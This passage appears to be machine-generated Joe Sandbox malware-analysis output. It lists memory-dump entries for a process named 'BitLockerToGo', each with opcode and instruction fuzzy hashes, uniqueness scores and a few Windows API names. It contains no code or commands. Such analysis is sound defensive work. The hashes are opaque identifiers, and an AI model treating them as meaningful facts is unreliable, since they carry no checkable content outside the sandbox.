                                                              • Source File: 00000005.00000002.2531747935.0000000002CF0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_2cf0000_BitLockerToGo.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: fa0d323469e8bc422a234914c86f561b651520905a5c3b11bfdff34c540e72d8
                                                              • Instruction ID: 1509d2dd2239d876daaba47c22a42ebd48a66ff2c288210db78530b9dc378d50
                                                              • Opcode Fuzzy Hash: fa0d323469e8bc422a234914c86f561b651520905a5c3b11bfdff34c540e72d8
                                                              • Instruction Fuzzy Hash: E1428C716083519FE324CF18C890B2AFBE2BB95318F188A2DE5D597391D771E809CB92
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2531747935.0000000002CF0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_2cf0000_BitLockerToGo.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 25a1801816baaef0437f854e602f84fb005283c5716de19f461ad0cdef3beb3e
                                                              • Instruction ID: 10bf709f09ac1b0650bdb27084f5bdc70959ce941ec5fb1df71b585e6e561d8c
                                                              • Opcode Fuzzy Hash: 25a1801816baaef0437f854e602f84fb005283c5716de19f461ad0cdef3beb3e
                                                              • Instruction Fuzzy Hash: 2152DE315087818FC7A9CF29C09026BF7E1FF88314F188AADEADA57751D735A945CB81
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2531747935.0000000002CF0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_2cf0000_BitLockerToGo.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b669a96d2502376addc037353a48b29e2af4a1f0f83d9d46ae6f1014e29c7578
                                                              • Instruction ID: 025c802d690f41901ec134f26b7efce1e1f4cd62411df8e7fa6ff0bccd86b33a
                                                              • Opcode Fuzzy Hash: b669a96d2502376addc037353a48b29e2af4a1f0f83d9d46ae6f1014e29c7578
                                                              • Instruction Fuzzy Hash: 5E0171F5B0030167DBE0AF54A8D0727F2A9AF81708F18457CD90957701DB76EC06DBA1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2531747935.0000000002CF0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_2cf0000_BitLockerToGo.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 64793ac68d746bc0c342c885a144eb4b5e6dccb9de26e80ce5b6d12766413e6b
                                                              • Instruction ID: 880c9f9b3d514c25384fd0aff96b2a72aa9dd9810113218e71a90000327f6393
                                                              • Opcode Fuzzy Hash: 64793ac68d746bc0c342c885a144eb4b5e6dccb9de26e80ce5b6d12766413e6b
                                                              • Instruction Fuzzy Hash: C91121715097814FD326CF24C498767BFF2AF86304F19899EC4D68B692C775E80ACB54
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2531747935.0000000002CF0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_2cf0000_BitLockerToGo.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: e4b88fc11bb6d2380729816ced2cd4e417297d3d1b1b98f97eeaec5da9395532
                                                              • Instruction ID: 9bc2c8da0d8fa0d6fc79156a0ebc8ac84b98d19a9bc0bc7aef7b27f564740199
                                                              • Opcode Fuzzy Hash: e4b88fc11bb6d2380729816ced2cd4e417297d3d1b1b98f97eeaec5da9395532
                                                              • Instruction Fuzzy Hash: 011125B0601602DBD318CF28E5A4B17FBF2BF0A704F04895CC49A8BB92C775E855CB84
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2531747935.0000000002CF0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_2cf0000_BitLockerToGo.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 3d0e802915a5efea327527d4a6decd6b8dd4bd247acaf2e52eea6b8972f1cff8
                                                              • Instruction ID: 02f20d5d4e9089a679f11182df01da168cf4757e50f3b384eb932bd879091972
                                                              • Opcode Fuzzy Hash: 3d0e802915a5efea327527d4a6decd6b8dd4bd247acaf2e52eea6b8972f1cff8
                                                              • Instruction Fuzzy Hash: 68F0D475E451058FC708CF18D080864FBB5FB593147119559D959AB322C730EC60CF44
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2531747935.0000000002CF0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_2cf0000_BitLockerToGo.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 79127fe556a9658405add75cbb008b61965c50460a1e8f74fae70ebd445fb217
                                                              • Instruction ID: 933e5a54afd33433236d51f1e958ac7d55fa9f0f2f48ebf16da3664388a203cd
                                                              • Opcode Fuzzy Hash: 79127fe556a9658405add75cbb008b61965c50460a1e8f74fae70ebd445fb217
                                                              • Instruction Fuzzy Hash: 0DE0EC3AE440048BCB04CF58E0C08B8B3F4EB0E314B142419E965F7351CA34BDA1CF14
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2531747935.0000000002CF0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_2cf0000_BitLockerToGo.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 7fde5f97e0ab0fd8ab4c8d39117576fc177f609512b4090b6a92a82144f4705b
                                                              • Instruction ID: 4e16c07390c266d3fd76c855bc79c5f8d1582e6d42c1c01a4243cc17fa4d6a81
                                                              • Opcode Fuzzy Hash: 7fde5f97e0ab0fd8ab4c8d39117576fc177f609512b4090b6a92a82144f4705b
                                                              • Instruction Fuzzy Hash: 89D0173AB846808BC264DE18D5A29B6B372BB8A204B08AA58C5D2D7705C234E8158A94
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2531747935.0000000002CF0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_2cf0000_BitLockerToGo.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: d22671c29ecb38c2daf020fda9dc691e2951c940a4d9c163092ace2511f93e50
                                                              • Instruction ID: 4cf4a9bf7bb87c5e02a8c71a5be451d3bdffb49d20e37679c9e0197a0fc21510
                                                              • Opcode Fuzzy Hash: d22671c29ecb38c2daf020fda9dc691e2951c940a4d9c163092ace2511f93e50
                                                              • Instruction Fuzzy Hash: C6C01279A442408BC7489D44D0D1774E3757746219F04282CC492D7740C360E8148544
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2531747935.0000000002CF0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_2cf0000_BitLockerToGo.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: ff427d52342fc83deeabae6ae22dd88f7b6748f665d9b2e96050f375aa7a095a
                                                              • Instruction ID: b573a671cae6ba2743a474262b9d754efe6235a8c14a8575f6327f8c8f630fe0
                                                              • Opcode Fuzzy Hash: ff427d52342fc83deeabae6ae22dd88f7b6748f665d9b2e96050f375aa7a095a
                                                              • Instruction Fuzzy Hash: BCC08C39E89150CBC305CF10E4C06B0B7789B0B204704B88A8D82DB383C220DC10CF6C
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2531747935.0000000002CF0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_2cf0000_BitLockerToGo.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 6afbb55a63cd3ee9b91bad49b70267d0dade7723843a67ab3d2061145c20739b
                                                              • Instruction ID: 7725ec7068dac90ffc3e852eda66421253c40f4a95b9e736643c1080287771bb
                                                              • Opcode Fuzzy Hash: 6afbb55a63cd3ee9b91bad49b70267d0dade7723843a67ab3d2061145c20739b
                                                              • Instruction Fuzzy Hash: FCC012B4D840405FC9C59F00E852571B3699F86204F0024249656D7382C520D8219D49
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2531747935.0000000002CF0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_2cf0000_BitLockerToGo.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: afbe48a57ed01b769d298d0e4ac6f5229f520b85563a04a59e8da78af9ba1172
                                                              • Instruction ID: 3cce3776c5fc1d3edfe22c9799ef556a89a17f463e9e505fb541c3221e500ae0
                                                              • Opcode Fuzzy Hash: afbe48a57ed01b769d298d0e4ac6f5229f520b85563a04a59e8da78af9ba1172
                                                              • Instruction Fuzzy Hash: 0BC09235EC8180D79648CF08F992671A3BCE347208B287828C503F3381C531EC208A5C
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2531747935.0000000002CF0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_2cf0000_BitLockerToGo.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 0804ebee0e51b8c3b23c74d804bf2a3fe1bffd617a2b89dc054ba30ec5335200
                                                              • Instruction ID: fb61c0410cfb3d8463095d55450059a28fef35bc744a1f1da0f2b72de9800bbc
                                                              • Opcode Fuzzy Hash: 0804ebee0e51b8c3b23c74d804bf2a3fe1bffd617a2b89dc054ba30ec5335200
                                                              • Instruction Fuzzy Hash: 4DB09234E8914097820CDE04E491430B33DA317309B00382D8802E3351C762D8258A5C
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2531747935.0000000002CF0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_2cf0000_BitLockerToGo.jbxd
                                                              Similarity
                                                              • API ID: Object$DeleteMetricsSelectSystem
                                                              • String ID:
                                                              • API String ID: 3911056724-3916222277
                                                              • Opcode ID: a197608d4fbf7660cbfadaae08c1bdb54ba56ece16ad3805cc476b29942c2234
                                                              • Instruction ID: 1883c09d2bed33dc2d4f48f0666a446c97ebc523cb20e1c551f2abae398c1913
                                                              • Opcode Fuzzy Hash: a197608d4fbf7660cbfadaae08c1bdb54ba56ece16ad3805cc476b29942c2234
                                                              • Instruction Fuzzy Hash: FE917CB4A04B009FC350EF29D595A1ABBF4FF49310F11892DE99ACB750E731A858CF92
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • RtlExpandEnvironmentStrings.NTDLL(00000000,FB6EFD5D,0000001E,00000000,00000000,?), ref: 02D12521
                                                              • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,?,?), ref: 02D12580
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2531747935.0000000002CF0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_2cf0000_BitLockerToGo.jbxd
                                                              Similarity
                                                              • API ID: EnvironmentExpandStrings
                                                              • String ID: HH$i,C
                                                              • API String ID: 237503144-2709025082
                                                              • Opcode ID: 93f2436a229be94cbcc6f8f4f63e21ac8510dd7a0a02744058bb26b5a4b80c80
                                                              • Instruction ID: d8e09e775828225027c22c22b1ae1e6256a4557896166b2e8278abe4732cf435
                                                              • Opcode Fuzzy Hash: 93f2436a229be94cbcc6f8f4f63e21ac8510dd7a0a02744058bb26b5a4b80c80
                                                              • Instruction Fuzzy Hash: F84178B02403049FDB68CF24D8D5B527BB6FB89304F545A5CEA9A8F786C771E812CB90
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000009,00000000,00000000,?), ref: 02D13A19
                                                              • RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000009,00000000,?,?), ref: 02D13A4C
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2531747935.0000000002CF0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_2cf0000_BitLockerToGo.jbxd
                                                              Similarity
                                                              • API ID: EnvironmentExpandStrings
                                                              • String ID: A)(+$Q9{;
                                                              • API String ID: 237503144-1231720092
                                                              • Opcode ID: be01926c66cd842982e8aa2f079d718e0736efcd3d9324ff701e9747f62645b0
                                                              • Instruction ID: a31f39cdbe728e8ecc0809efa4f5d05146df6efab3eb87bd2271fc1cbe337466
                                                              • Opcode Fuzzy Hash: be01926c66cd842982e8aa2f079d718e0736efcd3d9324ff701e9747f62645b0
                                                              • Instruction Fuzzy Hash: 213158716083919BD328CF15C8A4B5BBBE6FBC5748F104A2CF9965B381D77099098BD2
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%